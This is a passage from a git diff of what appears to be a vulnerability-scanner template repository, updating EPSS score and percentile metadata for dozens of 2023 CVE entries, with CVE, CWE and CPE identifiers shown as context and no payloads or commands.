@@ info: cve-id: CVE-2023-24488 cwe-id: CWE-79 epss-score: 0.01446 - epss-percentile: 0.85195 + epss-percentile: 0.85202 cpe: cpe:2.3:a:citrix:gateway:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-24489.yaml b/http/cves/2023/CVE-2023-24489.yaml index 050c5fc8b2..c50fa141e5 100644 --- a/http/cves/2023/CVE-2023-24489.yaml +++ b/http/cves/2023/CVE-2023-24489.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-24489 cwe-id: CWE-284,NVD-CWE-Other epss-score: 0.96908 - epss-percentile: 0.99616 + epss-percentile: 0.99618 cpe: cpe:2.3:a:citrix:sharefile_storage_zones_controller:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-24657.yaml b/http/cves/2023/CVE-2023-24657.yaml index 1f94007ba9..21b15aed3f 100644 --- a/http/cves/2023/CVE-2023-24657.yaml +++ b/http/cves/2023/CVE-2023-24657.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-24657 cwe-id: CWE-79 epss-score: 0.00085 - epss-percentile: 0.35419 + epss-percentile: 0.35431 cpe: cpe:2.3:a:phpipam:phpipam:1.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-24733.yaml b/http/cves/2023/CVE-2023-24733.yaml index ffbd7972a7..80facb02c1 100644 --- a/http/cves/2023/CVE-2023-24733.yaml +++ b/http/cves/2023/CVE-2023-24733.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-24733 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29488 + epss-percentile: 0.29493 cpe: cpe:2.3:a:pmb_project:pmb:7.4.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-24735.yaml b/http/cves/2023/CVE-2023-24735.yaml index af3b1c9d07..04d5737858 100644 --- a/http/cves/2023/CVE-2023-24735.yaml +++ b/http/cves/2023/CVE-2023-24735.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-24735 cwe-id: CWE-601 epss-score: 0.01149 - epss-percentile: 0.83233 + epss-percentile: 0.83242 cpe: cpe:2.3:a:pmb_project:pmb:7.4.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-24737.yaml b/http/cves/2023/CVE-2023-24737.yaml index b5f6ea47fb..224f375427 100644 --- a/http/cves/2023/CVE-2023-24737.yaml +++ b/http/cves/2023/CVE-2023-24737.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-24737 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29488 + epss-percentile: 0.29493 cpe: cpe:2.3:a:pmb_project:pmb:7.4.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml index 6c5ac1bbd3..f0a513b9c8 100644 --- a/http/cves/2023/CVE-2023-25135.yaml +++ b/http/cves/2023/CVE-2023-25135.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-25135 cwe-id: CWE-502 epss-score: 0.60011 - epss-percentile: 0.97405 + epss-percentile: 0.97406 cpe: cpe:2.3:a:vbulletin:vbulletin:5.6.7:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-25157.yaml b/http/cves/2023/CVE-2023-25157.yaml index 5510c1145f..e187540038 100644 --- a/http/cves/2023/CVE-2023-25157.yaml +++ b/http/cves/2023/CVE-2023-25157.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-25157 cwe-id: CWE-89 epss-score: 0.38863 - epss-percentile: 0.96815 + epss-percentile: 0.96817 cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-25346.yaml b/http/cves/2023/CVE-2023-25346.yaml index 6d9a24837f..c779a08d07 100644 --- a/http/cves/2023/CVE-2023-25346.yaml +++ b/http/cves/2023/CVE-2023-25346.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-25346 cwe-id: CWE-79 epss-score: 0.00089 - epss-percentile: 0.37353 + epss-percentile: 0.37366 cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-25573.yaml b/http/cves/2023/CVE-2023-25573.yaml index cc3f171b6f..8b5b7ae6db 100644 --- a/http/cves/2023/CVE-2023-25573.yaml +++ b/http/cves/2023/CVE-2023-25573.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-25573 cwe-id: CWE-862 epss-score: 0.02282 - epss-percentile: 0.88449 + epss-percentile: 0.88453 cpe: cpe:2.3:a:metersphere:metersphere:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-25717.yaml b/http/cves/2023/CVE-2023-25717.yaml index 2240138456..654ac8d0e6 100644 --- a/http/cves/2023/CVE-2023-25717.yaml +++ b/http/cves/2023/CVE-2023-25717.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-25717 cwe-id: CWE-94 epss-score: 0.95919 - epss-percentile: 0.99274 + epss-percentile: 0.99275 cpe: cpe:2.3:a:ruckuswireless:ruckus_wireless_admin:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-26067.yaml b/http/cves/2023/CVE-2023-26067.yaml index 9248ad021e..fc491405de 100644 --- a/http/cves/2023/CVE-2023-26067.yaml +++ b/http/cves/2023/CVE-2023-26067.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-26067 cwe-id: CWE-20 epss-score: 0.02289 - epss-percentile: 0.88466 + epss-percentile: 0.8847 cpe: cpe:2.3:o:lexmark:cxtpc_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-26255.yaml b/http/cves/2023/CVE-2023-26255.yaml index 76940dd1c9..2f8ad77c43 100644 --- a/http/cves/2023/CVE-2023-26255.yaml +++ b/http/cves/2023/CVE-2023-26255.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-26255 cwe-id: CWE-22 epss-score: 0.15825 - epss-percentile: 0.95341 + epss-percentile: 0.9534 cpe: cpe:2.3:a:stagil:stagil_navigation:*:*:*:*:*:jira:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-26256.yaml b/http/cves/2023/CVE-2023-26256.yaml index 163eee0e4a..d08eb8a7e5 100644 --- a/http/cves/2023/CVE-2023-26256.yaml +++ b/http/cves/2023/CVE-2023-26256.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-26256 cwe-id: CWE-22 epss-score: 0.007 - epss-percentile: 0.78104 + epss-percentile: 0.78117 cpe: cpe:2.3:a:stagil:stagil_navigation:*:*:*:*:*:jira:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-26360.yaml b/http/cves/2023/CVE-2023-26360.yaml index 438653adfe..27f6f57f63 100644 --- a/http/cves/2023/CVE-2023-26360.yaml +++ b/http/cves/2023/CVE-2023-26360.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-26360 cwe-id: CWE-284 epss-score: 0.91394 - epss-percentile: 0.98572 + epss-percentile: 0.98574 cpe: cpe:2.3:a:adobe:coldfusion:2018:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2648.yaml b/http/cves/2023/CVE-2023-2648.yaml index ed0fa5bbc7..42638c34d3 100644 --- a/http/cves/2023/CVE-2023-2648.yaml +++ b/http/cves/2023/CVE-2023-2648.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-2648 cwe-id: CWE-434 epss-score: 0.03783 - epss-percentile: 0.90816 + epss-percentile: 0.90821 cpe: cpe:2.3:a:weaver:e-office:9.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-26842.yaml b/http/cves/2023/CVE-2023-26842.yaml index 821e2c87e4..3b880ca832 100644 --- a/http/cves/2023/CVE-2023-26842.yaml +++ b/http/cves/2023/CVE-2023-26842.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-26842 cwe-id: CWE-79 epss-score: 0.00148 - epss-percentile: 0.50605 + epss-percentile: 0.5063 cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-26843.yaml b/http/cves/2023/CVE-2023-26843.yaml index 2e85989f5f..493c24344d 100644 --- a/http/cves/2023/CVE-2023-26843.yaml +++ b/http/cves/2023/CVE-2023-26843.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-26843 cwe-id: CWE-79 epss-score: 0.00146 - epss-percentile: 0.504 + epss-percentile: 0.50425 cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27008.yaml b/http/cves/2023/CVE-2023-27008.yaml index 5e9d6c974f..27af47bf3b 100644 --- a/http/cves/2023/CVE-2023-27008.yaml +++ b/http/cves/2023/CVE-2023-27008.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-27008 cwe-id: CWE-79 epss-score: 0.00081 - epss-percentile: 0.33867 + epss-percentile: 0.3388 cpe: cpe:2.3:a:atutor:atutor:2.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27034.yaml b/http/cves/2023/CVE-2023-27034.yaml index 0a4320ab70..39837fa025 100644 --- a/http/cves/2023/CVE-2023-27034.yaml +++ b/http/cves/2023/CVE-2023-27034.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-27034 cwe-id: CWE-89 epss-score: 0.01147 - epss-percentile: 0.83222 + epss-percentile: 0.83231 cpe: cpe:2.3:a:joommasters:jms_blog:2.5.5:*:*:*:*:prestashop:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-27159.yaml b/http/cves/2023/CVE-2023-27159.yaml index aa7c3012ce..a3cd51519a 100644 --- a/http/cves/2023/CVE-2023-27159.yaml +++ b/http/cves/2023/CVE-2023-27159.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-27159 cwe-id: CWE-918 epss-score: 0.00317 - epss-percentile: 0.67112 + epss-percentile: 0.67146 cpe: cpe:2.3:a:appwrite:appwrite:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27179.yaml b/http/cves/2023/CVE-2023-27179.yaml index 9269532bd2..3f907ba8fe 100644 --- a/http/cves/2023/CVE-2023-27179.yaml +++ b/http/cves/2023/CVE-2023-27179.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-27179 cwe-id: CWE-434 epss-score: 0.01606 - epss-percentile: 0.86019 + epss-percentile: 0.86023 cpe: cpe:2.3:a:gdidees:gdidees_cms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27292.yaml b/http/cves/2023/CVE-2023-27292.yaml index 959f582043..ee577b3bdb 100644 --- a/http/cves/2023/CVE-2023-27292.yaml +++ b/http/cves/2023/CVE-2023-27292.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-27292 cwe-id: CWE-601 epss-score: 0.00081 - epss-percentile: 0.34142 + epss-percentile: 0.34154 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2732.yaml b/http/cves/2023/CVE-2023-2732.yaml index e21297e9b6..a098d304e9 100644 --- a/http/cves/2023/CVE-2023-2732.yaml +++ b/http/cves/2023/CVE-2023-2732.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-2732 cwe-id: CWE-288,NVD-CWE-Other epss-score: 0.06703 - epss-percentile: 0.93065 + epss-percentile: 0.93069 cpe: cpe:2.3:a:inspireui:mstore_api:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27372.yaml b/http/cves/2023/CVE-2023-27372.yaml index a2c3203730..8b5912fbd7 100644 --- a/http/cves/2023/CVE-2023-27372.yaml +++ b/http/cves/2023/CVE-2023-27372.yaml @@ -19,7 +19,7 @@ info: cvss-score: 9.8 cve-id: CVE-2023-27372 epss-score: 0.97049 - epss-percentile: 0.99672 + epss-percentile: 0.99673 cpe: cpe:2.3:a:spip:spip:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-27482.yaml b/http/cves/2023/CVE-2023-27482.yaml index a6d282c8d6..f1040503d6 100644 --- a/http/cves/2023/CVE-2023-27482.yaml +++ b/http/cves/2023/CVE-2023-27482.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-27482 cwe-id: CWE-287 epss-score: 0.03609 - epss-percentile: 0.90606 + epss-percentile: 0.90613 cpe: cpe:2.3:a:home-assistant:home-assistant:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27524.yaml b/http/cves/2023/CVE-2023-27524.yaml index 60d4721db7..b5f996df8f 100644 --- a/http/cves/2023/CVE-2023-27524.yaml +++ b/http/cves/2023/CVE-2023-27524.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-27524 cwe-id: CWE-1188 epss-score: 0.91294 - epss-percentile: 0.9856 + epss-percentile: 0.98561 cpe: cpe:2.3:a:apache:superset:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27587.yaml b/http/cves/2023/CVE-2023-27587.yaml index 50da7398e4..b8e8bba0fa 100644 --- a/http/cves/2023/CVE-2023-27587.yaml +++ b/http/cves/2023/CVE-2023-27587.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-27587 cwe-id: CWE-209 epss-score: 0.25535 - epss-percentile: 0.96154 + epss-percentile: 0.96158 cpe: cpe:2.3:a:readtomyshoe_project:readtomyshoe:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-2766.yaml b/http/cves/2023/CVE-2023-2766.yaml index 5d51afa444..40fcf19195 100644 --- a/http/cves/2023/CVE-2023-2766.yaml +++ b/http/cves/2023/CVE-2023-2766.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-2766 cwe-id: CWE-552 epss-score: 0.01769 - epss-percentile: 0.86637 + epss-percentile: 0.8664 cpe: cpe:2.3:a:weaver:weaver_office_automation:9.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2779.yaml b/http/cves/2023/CVE-2023-2779.yaml index 77fa9a51d5..81ff2b6b75 100644 --- a/http/cves/2023/CVE-2023-2779.yaml +++ b/http/cves/2023/CVE-2023-2779.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-2779 cwe-id: CWE-79 epss-score: 0.00185 - epss-percentile: 0.55584 + epss-percentile: 0.55607 cpe: cpe:2.3:a:heator:social_share\,_social_login_and_social_comments:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2780.yaml b/http/cves/2023/CVE-2023-2780.yaml index 88aa787910..08599c1d2d 100644 --- a/http/cves/2023/CVE-2023-2780.yaml +++ b/http/cves/2023/CVE-2023-2780.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-2780 cwe-id: CWE-29 epss-score: 0.01608 - epss-percentile: 0.86028 + epss-percentile: 0.86033 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27922.yaml b/http/cves/2023/CVE-2023-27922.yaml index 38696a7f65..3362c2a58b 100644 --- a/http/cves/2023/CVE-2023-27922.yaml +++ b/http/cves/2023/CVE-2023-27922.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-27922 cwe-id: CWE-79 - epss-score: 0.00129 - epss-percentile: 0.47416 + epss-score: 0.00113 + epss-percentile: 0.44627 cpe: cpe:2.3:a:thenewsletterplugin:newsletter:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2796.yaml b/http/cves/2023/CVE-2023-2796.yaml index 02d955f724..871da0b99d 100644 --- a/http/cves/2023/CVE-2023-2796.yaml +++ b/http/cves/2023/CVE-2023-2796.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-2796 cwe-id: CWE-862 epss-score: 0.23651 - epss-percentile: 0.96042 + epss-percentile: 0.96045 cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-28121.yaml b/http/cves/2023/CVE-2023-28121.yaml index c2b52b20ee..57e2ebfd1e 100644 --- a/http/cves/2023/CVE-2023-28121.yaml +++ b/http/cves/2023/CVE-2023-28121.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-28121 cwe-id: CWE-287 epss-score: 0.75551 - epss-percentile: 0.97818 + epss-percentile: 0.97822 cpe: cpe:2.3:a:automattic:woocommerce_payments:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2813.yaml b/http/cves/2023/CVE-2023-2813.yaml index ef6f4b03d5..7776b6b8ae 100644 --- a/http/cves/2023/CVE-2023-2813.yaml +++ b/http/cves/2023/CVE-2023-2813.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2023-2813 cwe-id: CWE-79 epss-score: 0.00371 - epss-percentile: 0.6959 + epss-percentile: 0.69618 cpe: cpe:2.3:a:ajaydsouza:connections_reloaded:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2822.yaml b/http/cves/2023/CVE-2023-2822.yaml index 0c2d28c819..3a89ebb40f 100644 --- a/http/cves/2023/CVE-2023-2822.yaml +++ b/http/cves/2023/CVE-2023-2822.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-2822 cwe-id: CWE-79 epss-score: 0.02305 - epss-percentile: 0.885 + epss-percentile: 0.88504 cpe: cpe:2.3:a:ellucian:ethos_identity:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-2825.yaml b/http/cves/2023/CVE-2023-2825.yaml index c03f477d67..fc0558c0d2 100644 --- a/http/cves/2023/CVE-2023-2825.yaml +++ b/http/cves/2023/CVE-2023-2825.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-2825 cwe-id: CWE-22 epss-score: 0.03119 - epss-percentile: 0.8998 + epss-percentile: 0.89984 cpe: cpe:2.3:a:gitlab:gitlab:16.0.0:*:*:*:community:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-28343.yaml b/http/cves/2023/CVE-2023-28343.yaml index 1797cb9085..767a37a8e4 100644 --- a/http/cves/2023/CVE-2023-28343.yaml +++ b/http/cves/2023/CVE-2023-28343.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-28343 cwe-id: CWE-78 epss-score: 0.40034 - epss-percentile: 0.96854 + epss-percentile: 0.96856 cpe: cpe:2.3:o:apsystems:energy_communication_unit_firmware:c1.2.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-28432.yaml b/http/cves/2023/CVE-2023-28432.yaml index 18a9634ddc..b8fa7992f6 100644 --- a/http/cves/2023/CVE-2023-28432.yaml +++ b/http/cves/2023/CVE-2023-28432.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-28432 cwe-id: CWE-200,NVD-CWE-noinfo epss-score: 0.1675 - epss-percentile: 0.9545 + epss-percentile: 0.95451 cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-28665.yaml b/http/cves/2023/CVE-2023-28665.yaml index 2d9461e84c..ccb6759901 100644 --- a/http/cves/2023/CVE-2023-28665.yaml +++ b/http/cves/2023/CVE-2023-28665.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-28665 cwe-id: CWE-79 epss-score: 0.00082 - epss-percentile: 0.3426 + epss-percentile: 0.34271 cpe: cpe:2.3:a:technocrackers:bulk_price_update_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-29298.yaml b/http/cves/2023/CVE-2023-29298.yaml index 10d499a6df..af6a06f91c 100644 --- a/http/cves/2023/CVE-2023-29298.yaml +++ b/http/cves/2023/CVE-2023-29298.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-29298 cwe-id: CWE-284,NVD-CWE-Other epss-score: 0.75542 - epss-percentile: 0.97818 + epss-percentile: 0.97821 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-29300.yaml b/http/cves/2023/CVE-2023-29300.yaml index 9fa05c5526..6fc3d8c3b9 100644 --- a/http/cves/2023/CVE-2023-29300.yaml +++ b/http/cves/2023/CVE-2023-29300.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-29300 cwe-id: CWE-502 epss-score: 0.63765 - epss-percentile: 0.97487 + epss-percentile: 0.97489 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-29357.yaml b/http/cves/2023/CVE-2023-29357.yaml index 7184cf6d1c..55cc3d4a98 100644 --- a/http/cves/2023/CVE-2023-29357.yaml +++ b/http/cves/2023/CVE-2023-29357.yaml @@ -17,7 +17,7 @@ info: cvss-score: 9.8 cve-id: CVE-2023-29357 epss-score: 0.76124 - epss-percentile: 0.97834 + epss-percentile: 0.97836 cpe: cpe:2.3:a:microsoft:sharepoint_server:2019:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-29439.yaml b/http/cves/2023/CVE-2023-29439.yaml index 0e0fb4d82b..8d25648ac7 100644 --- a/http/cves/2023/CVE-2023-29439.yaml +++ b/http/cves/2023/CVE-2023-29439.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-29439 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.37111 + epss-percentile: 0.37124 cpe: cpe:2.3:a:fooplugins:foogallery:*:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-29489.yaml b/http/cves/2023/CVE-2023-29489.yaml index e45a545437..3cccdd0206 100644 --- a/http/cves/2023/CVE-2023-29489.yaml +++ b/http/cves/2023/CVE-2023-29489.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-29489 cwe-id: CWE-79 epss-score: 0.00167 - epss-percentile: 0.53238 + epss-percentile: 0.53267 cpe: cpe:2.3:a:cpanel:cpanel:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-29622.yaml b/http/cves/2023/CVE-2023-29622.yaml index a32c68d7e5..8bd4a770d8 100644 --- a/http/cves/2023/CVE-2023-29622.yaml +++ b/http/cves/2023/CVE-2023-29622.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-29622 cwe-id: CWE-89 epss-score: 0.01215 - epss-percentile: 0.83756 + epss-percentile: 0.83764 cpe: cpe:2.3:a:purchase_order_management_project:purchase_order_management:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-29623.yaml b/http/cves/2023/CVE-2023-29623.yaml index cc589d69fa..ade7e8b813 100644 --- a/http/cves/2023/CVE-2023-29623.yaml +++ b/http/cves/2023/CVE-2023-29623.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-29623 cwe-id: CWE-79 epss-score: 0.00096 - epss-percentile: 0.39953 + epss-percentile: 0.3997 cpe: cpe:2.3:a:purchase_order_management_project:purchase_order_management:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-2982.yaml b/http/cves/2023/CVE-2023-2982.yaml index 3ec8b924e9..65837a003d 100644 --- a/http/cves/2023/CVE-2023-2982.yaml +++ b/http/cves/2023/CVE-2023-2982.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-2982 cwe-id: CWE-288 epss-score: 0.01048 - epss-percentile: 0.82375 + epss-percentile: 0.82387 cpe: cpe:2.3:a:miniorange:wordpress_social_login_and_register_\(discord\,_google\,_twitter\,_linkedin\):*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-29887.yaml b/http/cves/2023/CVE-2023-29887.yaml index 32f686461a..af3c1f786e 100644 --- a/http/cves/2023/CVE-2023-29887.yaml +++ b/http/cves/2023/CVE-2023-29887.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-29887 cwe-id: CWE-22 epss-score: 0.00439 - epss-percentile: 0.71962 + epss-percentile: 0.71986 cpe: cpe:2.3:a:nuovo:spreadsheet-reader:0.5.11:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-29919.yaml b/http/cves/2023/CVE-2023-29919.yaml index 329e21fa11..6e8d71521e 100644 --- a/http/cves/2023/CVE-2023-29919.yaml +++ b/http/cves/2023/CVE-2023-29919.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-29919 cwe-id: CWE-276 epss-score: 0.01262 - epss-percentile: 0.84137 + epss-percentile: 0.84146 cpe: cpe:2.3:o:contec:solarview_compact_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-29922.yaml b/http/cves/2023/CVE-2023-29922.yaml index 904a8a6aaf..dfd2217ddc 100644 --- a/http/cves/2023/CVE-2023-29922.yaml +++ b/http/cves/2023/CVE-2023-29922.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-29922 cwe-id: CWE-1188 epss-score: 0.00448 - epss-percentile: 0.72233 + epss-percentile: 0.72257 cpe: cpe:2.3:a:powerjob:powerjob:4.3.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-29923.yaml b/http/cves/2023/CVE-2023-29923.yaml index 3c11a8cb1a..843a9803bf 100644 --- a/http/cves/2023/CVE-2023-29923.yaml +++ b/http/cves/2023/CVE-2023-29923.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-29923 cwe-id: CWE-276 epss-score: 0.00336 - epss-percentile: 0.68114 + epss-percentile: 0.6814 cpe: cpe:2.3:a:powerjob:powerjob:4.3.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30013.yaml b/http/cves/2023/CVE-2023-30013.yaml index e8f2f76f9c..f656ce5f6b 100644 --- a/http/cves/2023/CVE-2023-30013.yaml +++ b/http/cves/2023/CVE-2023-30013.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-30013 cwe-id: CWE-78 epss-score: 0.93618 - epss-percentile: 0.98838 + epss-percentile: 0.98839 cpe: cpe:2.3:o:totolink:x5000r_firmware:9.1.0u.6118_b20201102:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-30019.yaml b/http/cves/2023/CVE-2023-30019.yaml index 383de31bab..25f5223cb3 100644 --- a/http/cves/2023/CVE-2023-30019.yaml +++ b/http/cves/2023/CVE-2023-30019.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-30019 cwe-id: CWE-918 epss-score: 0.00094 - epss-percentile: 0.39556 + epss-percentile: 0.3957 cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30150.yaml b/http/cves/2023/CVE-2023-30150.yaml index 987b9314f7..83231763ab 100644 --- a/http/cves/2023/CVE-2023-30150.yaml +++ b/http/cves/2023/CVE-2023-30150.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-30150 cwe-id: CWE-89 epss-score: 0.02634 - epss-percentile: 0.89196 + epss-percentile: 0.89202 cpe: cpe:2.3:a:leotheme:leocustomajax:1.0.0:*:*:*:*:prestashop:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30210.yaml b/http/cves/2023/CVE-2023-30210.yaml index 380d090f1a..a7a4146012 100644 --- a/http/cves/2023/CVE-2023-30210.yaml +++ b/http/cves/2023/CVE-2023-30210.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-30210 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29569 + epss-percentile: 0.29573 cpe: cpe:2.3:a:ourphp:ourphp:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30212.yaml b/http/cves/2023/CVE-2023-30212.yaml index c9e2ae147f..e87d282fef 100644 --- a/http/cves/2023/CVE-2023-30212.yaml +++ b/http/cves/2023/CVE-2023-30212.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-30212 cwe-id: CWE-79 epss-score: 0.02614 - epss-percentile: 0.89152 + epss-percentile: 0.8916 cpe: cpe:2.3:a:ourphp:ourphp:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30256.yaml b/http/cves/2023/CVE-2023-30256.yaml index 7b68cf7a3f..a7419b09bf 100644 --- a/http/cves/2023/CVE-2023-30256.yaml +++ b/http/cves/2023/CVE-2023-30256.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-30256 cwe-id: CWE-79 epss-score: 0.01434 - epss-percentile: 0.8513 + epss-percentile: 0.85137 cpe: cpe:2.3:a:webkul:qloapps:1.5.2:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-30625.yaml b/http/cves/2023/CVE-2023-30625.yaml index 226dba31c2..e621e246f7 100644 --- a/http/cves/2023/CVE-2023-30625.yaml +++ 